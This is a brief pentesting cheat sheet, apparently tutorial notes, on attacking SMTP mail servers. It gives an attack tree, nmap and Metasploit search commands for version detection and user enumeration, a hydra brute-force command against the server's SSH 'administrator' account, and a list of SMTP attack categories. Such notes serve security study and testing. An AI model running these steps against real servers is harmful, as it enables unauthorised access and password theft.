SMTP exploits

Attack tree

1 Port scan
2 Recon
    2.1 Detect version
    2.2 Enumerate users
    2.3 Identify possible exploits
3 Exploit


msf > search smtp
msf > search scanner name:smtp
msf > search exploit name:smtp -S excellent

Lucky trail

Run a port scan against the email server (first try 25):

# nmap -A -p 25 <IP address mailserver>

Detect SMTP version:

# msfconsole
msf > search smtp_version

Research Mail Transfer Agent (MTA). Things that can help:

  • When connecting, the greeting (code 220) will often spell out Postfix

  • Common error messages are not strictly standardised - deliberately triggering an error (syntax, non-existing address, …) will often return a message unique to one software

  • Many providers will publish what they use (almost have to, in order to hire specialists)

Enumerate users:

msf > search smtp_enum

Crack SSH password:

# hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV <IP address mailserver> ssh

SSH into the server as the user:

# ssh administrator@<IP address mailserver>


The Simple Mail Transfer Protocol (SMTP) is the Internet protocol for sending email. SMTP uses TCP port 25.

There are eight basic categories of SMTP exploits:

  • Cleartext sniffing of authentication, email messages, and attachments; banner grabbing

  • Relaying spam and phishing

  • Email account enumeration

  • Brute forcing account passwords

  • Buffer overflows for arbitrary code execution

  • Privilege escalation

  • Denial of service

  • Authentication bypass